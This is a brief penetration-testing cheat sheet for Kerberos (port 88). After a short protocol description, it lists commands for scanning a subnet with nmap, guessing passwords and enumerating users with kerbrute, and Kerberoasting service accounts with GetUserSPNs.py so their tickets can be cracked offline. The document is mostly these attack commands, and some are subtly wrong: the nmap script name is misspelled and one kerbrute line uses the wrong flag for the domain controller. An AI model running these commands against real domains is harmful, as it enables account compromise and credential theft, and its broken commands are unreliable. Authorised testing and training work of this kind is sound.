Kerberos (88)

Kerberos is a network authentication protocol that works on the basis of "tickets" to allow nodes to prove their identity over a non-secure network in a secure manner. Kerberos provides mutual authentication—both the user and the server verify each other's identity.

Identify Kerberos
To find all machines on a network that respond to Kerberos on TCP port 88:

nmap -p 88 --open --script=keberos -Pn -oA nmap/Kerberos 10.0.0.0/24

Password Guessing
Test for weak passwords associated with Kerberos-enabled users.

kerbrute password -d domain.com -t 10.0.0.1 UsersPasswords.txt

User enumeration

./kerbrute_linux_amd64 userenum --dc 192.168.221.187 -d access ../../SecLists/Usernames/xato-net-10-million-usernames.txt

Kerberoasting
User accounts with SPNs can be Kerberoasted. This involves requesting a service ticket for the user, which can then be cracked offline.

python GetUserSPNs.py -request -dc-ip 10.0.0.1 DOMAIN/user